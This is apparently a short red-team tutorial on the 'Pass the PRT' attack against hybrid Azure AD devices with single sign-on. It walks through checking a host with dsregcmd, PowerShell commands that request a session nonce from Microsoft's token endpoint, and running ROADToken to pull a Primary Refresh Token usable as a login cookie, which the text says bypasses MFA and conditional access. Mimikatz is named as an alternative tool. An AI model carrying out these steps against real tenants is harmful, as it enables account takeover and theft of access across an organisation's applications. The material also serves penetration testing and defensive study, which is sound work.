Pass the PRT

This attack exploits devices with SSO enabled in hybrid Azure environments. PRTs can authenticate into any application, bypass MFA with the built-in MFA claim and satisfy every conditional access policy.

This attack leverages the native presence of the BrowserCore extension on devices with SSO enabled, this extension allows to generate and sign a PRT but requires a session nonce so the attacker can initialize a SSO session to obtain the initial nonce and then pipe the requests to the extension to get the full PRT out of it.

To perform the attack we'll use an awesome tool called ROADtoken but Mimikatz can be used as well. Checking if SSO is enabled on a host is a simple as using

Dsregcmd.exe /status

The AzureAdPrt and AzureAdJoined fields should both be set to YES.

If the host satisfies these conditions we can go ahead and request a session nonce

PS /home/otter> $tenantId = "<tenant_id>"
PS /home/otter> $url = "https://login.microsoftonline.com/$TenantId/oauth2/token"
PS /home/otter> $params = @{
>> "URI" = $url
>> "Method" = "POST"
>> }
PS /home/otter> $body = @{
>> "grant_type" = "srv_challenge"
>> }
PS /home/otter> $result = Invoke-RestMethod $params -UseBasicParsing -Body $body
PS /home/otter> $result.Nonce

With the nonce value we can request an actual PRT

PS /home/otter> .\ROADToken.exe "<nonce>"

this will return a JSON object with a x-ms-RefreshTokenCredential field that can be used as a cookie to authenticate.

As mentioned, this attack can also be pulled off with Mimikatz, the process is longer but it allows to get a better overview of how the tokens are created by the browser extension.

To know more about the process i suggest reading this post.